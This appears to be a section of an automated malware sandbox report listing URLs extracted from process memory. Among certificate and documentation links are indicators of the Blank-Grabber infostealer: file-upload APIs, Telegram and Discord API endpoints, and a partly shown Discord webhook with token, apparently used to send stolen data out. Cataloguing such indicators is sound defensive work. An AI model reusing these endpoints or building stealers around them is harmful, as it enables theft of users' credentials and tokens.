              Source: powershell.exe, 0000000A.00000002.1921700261.0000022BECA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CC80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168E42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000002.2112093875.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C435C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700295776.00000162C435C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: cmd.exeString found in binary or memory: http://ocsp.sectigo.com0$
              Source: cmd.exe, 00000000.00000002.2112093875.00000162C4338000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigoc
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDCBE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDC9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168CAC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDCBE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: cmd.exe, 00000000.00000003.1700295776.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701072162.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: cmd.exe, 00000000.00000003.1697853254.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698520496.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700392163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698930176.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1700617326.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699982456.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701982831.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699040150.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701369163.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698782625.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1701468471.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699151811.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1699275879.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1698681168.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000000.00000003.1697979195.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.dr, _ctypes.pyd.0.dr, _hashlib.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: cmd.exe, 00000001.00000002.2096563852.000001C916813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: powershell.exe, 0000002A.00000002.1920794731.00000216A4D78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: cmd.exe, 00000001.00000002.2098403824.000001C916CB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1794009198.000001C916CB6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1936188709.000001C916CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: cmd.exe, 00000001.00000002.2100068134.000001C917A74000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000A.00000002.1861065562.0000022BDC9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168CAC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: cmd.exe, 00000001.00000002.2100068134.000001C9179B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadrU
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr;r
              Source: cmd.exe, 00000001.00000003.1936488161.000001C916CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s)
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%sp
              Source: cmd.exe, 00000001.00000002.2100068134.000001C917A04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: cmd.exe, rar.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1309732604697772032/jYDmGek7yWvABusaZDozvumeMuAZjheHcNL9cOnpMCpam2e
              Source: cmd.exe, 00000001.00000002.2098529870.000001C916CF7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1936488161.000001C916CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915C70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1705592637.000001C914409000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmd.exe, 00000001.00000003.1935481751.000001C9168CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.28.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.28.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.28.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.28.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Blank-GrabberrU
Source: cmd.exe, 00000001.00000003.1711260677.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1712399231.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711786207.000001C916970000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.1711452846.000001C916D3A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 0000002A.00000002.1859004442.000002168E3A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095490915.000001C915CFC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: cmd.exe, 00000001.00000003.1705560173.000001C914463000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: cmd.exe, 00000001.00000002.2098654232.000001C916D30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: cmd.exe, 00000001.00000002.2098765612.000001C916E50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: cmd.exe, 00000001.00000002.2098872517.000001C916F80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 0000002A.00000002.1859004442.000002168D998000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/
Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096563852.000001C916829000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2092429001.000001C916827000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail
Source: cmd.exe, 00000001.00000002.2095198142.000001C9143C0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://google.com/mail/
Source: cmd.exe, 00000001.00000003.1713188460.000001C916961000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2096452149.000001C916630000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: cmd.exe, 00000001.00000002.2097860677.000001C9169B8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: cmd.exe, 00000001.00000002.2097860677.000001C916A25000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/
Source: cmd.exe, 00000001.00000002.2096563852.000001C916730000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://json.org
Source: cmd.exe, 00000001.00000002.2100068134.000001C917A5C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: cmd.exe, 00000001.00000002.2100068134.000001C9179C8000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000001.00000003.2091061273.000001C916C79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2100068134.000001C917A58000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com
Source: powershell.exe, 0000000A.00000002.1921700261.0000022BECA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CC80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1859004442.000002168E42F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.1908083358.000002169CB3E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000001C.00000003.1775846241.00000240CA8C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr, edb.log.28.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.28.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 0000002A.00000002.1859004442.000002168E115000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
